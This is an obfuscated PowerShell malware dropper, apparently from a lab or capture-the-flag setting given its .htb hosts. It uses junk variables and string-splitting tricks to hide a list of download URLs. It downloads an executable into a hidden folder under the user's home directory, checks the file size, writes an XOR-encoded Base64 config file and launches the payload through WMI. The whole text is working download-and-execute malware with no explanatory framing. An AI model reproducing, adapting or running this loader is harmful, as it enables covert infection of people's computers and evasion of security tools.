SV 0zX ([Type]"System.IO.Directory");
set TxySeo ([Type]"System.Net.ServicePointManager");
$Nbf5tg3 = ('B9yp90s');
$Vxnlre0 = $Cludkjx + [char](64) + $R6r1tuy;
$Ky3q0e8 = ('Rqdxwo5');
(Dir Variable:0Zx).Value::"CreateDirectory"($HOME + ('nDpJrbevk4nDpCcwr_2hnDp') -Replace('nDp'), [char]92));
$FN5ggmsH = (182, 187, 229, 146, 231, 177, 151, 149, 166);
$Pyozgeo = ('J5fy1cc');
(Variable TxySeo).Value::"SecurityProtocol" = ('Tls12');
$FN5ggmsH += (186, 141, 228, 182, 177, 171, 229, 236, 239, 239, 239, 228, 181, 182, 171, 229, 234, 239, 239, 228);
$Huajgb0 = ('Jno5ga1');
$Bb28umo = ('Ale7g_8');
$Hsce_js = ('Kvnbov_');
$Spk51ue = ('C7xo9gl');
$Scusbkj = $HOME + ('5tfJrbevk45tfCcwr_2h5tf') -Replace([char]53 + [char]116 + [char]102), [char]92) + $Bb28umo + ('.exe');
$FN5ggmsH += (185, 179, 190, 184, 229, 151, 139, 157, 164, 235, 177, 239, 171, 183, 236, 141, 128, 187, 235, 134, 128, 158, 177, 176, 139);
$hbmskV2T = ('C7xo9gl');
$hbmskV2T = $HOME + ('5tfJrbevk45tfCcwr_2h5tf') -Replace([char]53 + [char]116 + [char]102), [char]92) + $Bb28umo + ('.conf');
$Q1_y05_ = ('W4qvyz8');
$Odb3hf3 = &('new-object') Net.WebClient;
$FN5ggmsH += (183, 154, 173, 128, 175, 151, 238, 140, 183, 162, 228, 170, 173, 179, 229);
$Anbyt1y = ('h'+('ttp:'+']['+'(s)]')+(('w]'+'[('))+(('s)'+']w'))+('da'+'-')+'i'+'n'+'du'+('s'+'trial.'+'h'+'t')+'b]'+('[(s)]'+'w'+'js')+((']'+'[('))+(('s'+')]w9IdL'+'P]['+'(s'+')]w'+'@h'))+('t'+'tp:]')+('[(s'+')]')+'w'+(']'+'[(s)]')+('wdap'+'ro'+'fesiona'+'l.h')+'tb'+('][(s'+')'+']')+'w'+('d'+'ata')+('4][(s'+')]wh')+('WgW'+'jT')+('V]'+'[')+('(s)]w@http'+'s:][(s'+')]'+'w'+']')+'['+('(s)'+']wdag'+'ra')+'ni'+'t'+('eg'+'ia')+('re.h'+'t')+'b]'+('['+'(s)')+(']ww'+'p-a'+'dm'+'in][(s)'+']wt')+('V]['+'(s'+')')+(']w@'+'h')+'tt'+'p'+(':'+'][')+('(s)]w]['+'(s'+')]www'+'w'+'.out'+'s'+'p')+('ok'+'e')+'nv'+'i'+('s'+'ions.')+('htb'+']')+'['+('(s)]w'+'wp'+'-in')+('clu'+'d')+('es][(s)'+']waW'+'o'+'M')+(']'+'[('+'s)]w')+('@'+'http:]')+('[(s)'+']w][('+'s)')+(']wmo'+'bs')+('o'+'uk.h')+(('t'+'b][('))+(('s)'+']wwp-'))+'in'+'c'+'l'+('ude'+'s]'+'[')+('(s)]'+'w')+('UY'+'30R]')+('[(s'+')]w'+'@'+'h'+'ttp:][')+('('+'s)]w')+(']['+'(s)')+(']'+'wb')+'i'+('g'+'laugh'+'s')+(('.h'+'t'+'b][(s'))+((')]'))+('ws'+'mallpot'+'ato')+'es'+((']'+'[(s'))+((')]wY]'+'[(s'+')]w'+'@h'+'ttps:][(s)'))+']w'+('][('+'s)]wn'+'g')+('ll'+'o')+('gist'+'i')+('cs.'+'h')+'t'+('b]'+'['+'('+'s)]w')+'ad'+('mi'+'n')+'er'+']'+('[(s'+')]w'+'W3m')+'k'+(('B'+'][(s'))+((')'+']w')))."rep`LAcE"((']'+'['+('(s)]'+'w')),([array]('/'),('xw'+'e'))[0])."sP`lIT"($Ivg3zcu + $Vxnlre0 + $Jzaewdy);
$Gcoyvlv = ('Kf_9et1');
foreach ($A8i3ke1 in $Anbyt1y){
	try{
		$Odb3hf3."DownloadFile"($A8i3ke1, $Scusbkj);
		$Zhcnaux = ('Ekkj47t');
		If ((&('Get-Item') $Scusbkj)."Length" -ge 45199){
			${$A8i3ke1}.("ToCharArray").Invoke() | .("ForEach-Object") -process {${FN5ggmsH} += ([byte][char]${_} -bxor 0xdf)};
			$FN5ggmsH += (228);
			$b0Rje = [type]("Convert");
			$b0Rje::"toBase64String"(${fn5`ggm`sh}) | .("out-file") ${hB`mSK`V2T};
			([wmiclass]'win32_Process').Create($Scusbkj);
			$Glwki6a = ('Imtdxv6');
			break;
			$Pfpblh1 = ('Vslalcu')
		}
	}
	catch{}
}
$F47ief2 = ('Bnzidrt')